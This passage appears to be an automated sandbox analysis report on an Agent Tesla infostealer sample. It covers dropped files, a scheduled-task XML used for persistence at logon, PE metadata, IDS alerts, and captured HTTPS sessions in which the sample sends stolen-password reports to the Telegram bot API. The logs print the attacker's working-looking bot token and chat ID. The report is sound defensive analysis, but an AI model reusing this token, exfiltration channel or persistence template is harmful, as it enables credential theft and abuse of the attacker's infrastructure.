MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a2o4mph.ei2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1mcczme.v4h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d00n0thz.x2s.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtrmytf2.11h.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ip453cia.zu4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lo1mk02m.3gr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.109889765923158
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta4xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTFv
MD5:	0E7AB7D846AA7CAE05E000CC2F1399CB
SHA1:	38BFBF249A126BB30CA8A7D62D0C95D0BE0346FA
SHA-256:	E8C26632B0FD5E114EEC2B41D759C1BFFA6B117B672CA00CA37180C4295EF3F0
SHA-512:	57440AAF3BBB2608505189947E5B805C411C04CD1EACCE22045D16CCCAC2FBD7A255985F31F681518D27A925E8B188F117414678051D47390D48B44E55B368BA
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpADE2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\eFzAvsOm.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.109889765923158
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta4xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTFv
MD5:	0E7AB7D846AA7CAE05E000CC2F1399CB
SHA1:	38BFBF249A126BB30CA8A7D62D0C95D0BE0346FA
SHA-256:	E8C26632B0FD5E114EEC2B41D759C1BFFA6B117B672CA00CA37180C4295EF3F0
SHA-512:	57440AAF3BBB2608505189947E5B805C411C04CD1EACCE22045D16CCCAC2FBD7A255985F31F681518D27A925E8B188F117414678051D47390D48B44E55B368BA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\eFzAvsOm.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	707072
Entropy (8bit):	7.752616355003458
Encrypted:	false
SSDEEP:	12288:CnCnlWQQlEMqeT9M0czOdmAEXut89Pj0hoLmCEtYCmE:bl9QWaMXzOdMX94hoK5t2E
MD5:	DD2F23684673CA3E5C9F578764769B67
SHA1:	DF4B4D3A081E4A9160FEEF06452A7A4B9F2687B9
SHA-256:	F707FE133DC28A26C1BF930647601BC36D7FFDABE046C8EAC7A9C6C23E11E2FF
SHA-512:	7C47800FD704DD2A66110DB05D08D570086985DB8C64D073B9A5007A4A2B563F66E5740D7EE2F39C16172FC0B1336473D92C79719A664C38EE0F8292C9C71613
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16% Antivirus: Virustotal, Detection: 30%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.................................i...O.......................................p............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........w..@V..........0................................................0............{.....+..B...}.....(.........0............{.....+..B...}.....(.........0...........(........A(........(.......}.....(....}......, .... ....(....}......! .... ....(....}......@ .... ....(....}......$ .... ....(....}.......}......(....k.(....k.{....k"...."....s....}..... .(...(......( ...o!.....("...o#.....r...p".. A.s$...o%......}......}....*....0............{........,...o&...(......o&...

C:\Users\user\AppData\Roaming\eFzAvsOm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.752616355003458
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
File size:	707'072 bytes
MD5:	dd2f23684673ca3e5c9f578764769b67
SHA1:	df4b4d3a081e4a9160feef06452a7a4b9f2687b9
SHA256:	f707fe133dc28a26c1bf930647601bc36d7ffdabe046c8eac7a9c6c23e11e2ff
SHA512:	7c47800fd704dd2a66110db05d08d570086985db8c64d073b9a5007a4a2b563f66e5740d7ee2f39c16172fc0b1336473d92c79719a664c38ee0f8292c9c71613
SSDEEP:	12288:CnCnlWQQlEMqeT9M0czOdmAEXut89Pj0hoLmCEtYCmE:bl9QWaMXzOdMX94hoK5t2E
TLSH:	77E401A85629E107D86A57F40D71F1B427784EEEB402D307AFE96DEFBA6BB104D04183
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4adebe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEECF1AE6 [Mon Dec 17 02:37:26 2096 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xade69	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0x5cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xab7f8	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xabec4	0xac000	b5f20a795feb30e5eccface6e1ccbaac	False	0.9126047533611918	data	7.76007204971442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xae000	0x5cc	0x600	fe2f309d3e09453af11af2fd6a2a58ea	False	0.4290364583333333	data	4.134408837523351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb0000	0xc	0x200	80272d881cf5b134a63b59811e7b8ed3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xae090	0x33c	data			0.4311594202898551
RT_MANIFEST	0xae3dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T10:00:32.826938+0200	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.4	49734	149.154.167.220	443	TCP
2024-10-08T10:00:32.826938+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49734	149.154.167.220	443	TCP
2024-10-08T10:00:32.827094+0200	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49734	TCP
2024-10-08T10:00:36.063817+0200	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.4	49736	149.154.167.220	443	TCP
2024-10-08T10:00:36.063817+0200	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49736	149.154.167.220	443	TCP
2024-10-08T10:00:36.064329+0200	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49736	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 10:00:30.435971022 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:30.436079025 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:30.436168909 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:30.447612047 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:30.447633028 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:31.095897913 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:31.096014023 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:31.098702908 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:31.098726034 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:31.099194050 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:31.146205902 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:31.189672947 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:31.231447935 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:31.377420902 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:31.377851963 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:31.377888918 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:32.826905012 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:32.826992035 CEST	443	49734	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:32.827116966 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:32.830949068 CEST	49734	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:34.482764959 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:34.482819080 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:34.482892990 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:34.486257076 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:34.486279011 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:35.172336102 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:35.172427893 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:35.175405979 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:35.175414085 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:35.175746918 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:35.224236012 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:35.276896000 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:35.319431067 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:35.482469082 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:35.482861042 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:35.482883930 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:36.063903093 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:36.064091921 CEST	443	49736	149.154.167.220	192.168.2.4
Oct 8, 2024 10:00:36.064158916 CEST	49736	443	192.168.2.4	149.154.167.220
Oct 8, 2024 10:00:36.064529896 CEST	49736	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 10:00:30.386374950 CEST	54589	53	192.168.2.4	1.1.1.1
Oct 8, 2024 10:00:30.393940926 CEST	53	54589	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 10:00:30.386374950 CEST	192.168.2.4	1.1.1.1	0x53df	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 10:00:30.393940926 CEST	1.1.1.1	192.168.2.4	0x53df	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	149.154.167.220	443	7676	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 08:00:31 UTC	260	OUT	POST /bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce74dbfe87fda Host: api.telegram.org Content-Length: 916 Expect: 100-continue Connection: Keep-Alive
2024-10-08 08:00:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-08 08:00:31 UTC	916	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 34 64 62 66 65 38 37 66 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 39 35 31 37 30 37 34 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 34 64 62 66 65 38 37 66 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 38 2f 32 30 32 34 20 30 34 3a 30 30 3a 32 39 0a 55 73 65 Data Ascii: -----------------------------8dce74dbfe87fdaContent-Disposition: form-data; name="chat_id"-4195170748-----------------------------8dce74dbfe87fdaContent-Disposition: form-data; name="caption"New PW Recovered!Time: 10/08/2024 04:00:29Use
2024-10-08 08:00:32 UTC	1050	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 08:00:31 GMT Content-Type: application/json Content-Length: 662 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":269,"from":{"id":6712831410,"is_bot":true,"first_name":"originlogger","username":"BABABA002_BOT"},"chat":{"id":-4195170748,"title":"originlogs002","type":"group","all_members_are_administrators":true},"date":1728374431,"document":{"file_name":"user-172892 2024-10-08 04-00-29.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIBDWcE5p8g_anzF-dqx8pvBO4OuNHTAAKJBQAChPooRHD69Z0HiP4zNgQ","file_unique_id":"AgADiQUAAoT6KEQ","file_size":319},"caption":"New PW Recovered!\n\nTime: 10/08/2024 04:00:29\nUser Name: user/172892\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	149.154.167.220	443	8104	C:\Users\user\AppData\Roaming\eFzAvsOm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 08:00:35 UTC	260	OUT	POST /bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dce74dc2626ac8 Host: api.telegram.org Content-Length: 916 Expect: 100-continue Connection: Keep-Alive
2024-10-08 08:00:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-08 08:00:35 UTC	916	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 34 64 63 32 36 32 36 61 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 39 35 31 37 30 37 34 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 34 64 63 32 36 32 36 61 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 38 2f 32 30 32 34 20 30 34 3a 30 30 3a 33 33 0a 55 73 65 Data Ascii: -----------------------------8dce74dc2626ac8Content-Disposition: form-data; name="chat_id"-4195170748-----------------------------8dce74dc2626ac8Content-Disposition: form-data; name="caption"New PW Recovered!Time: 10/08/2024 04:00:33Use
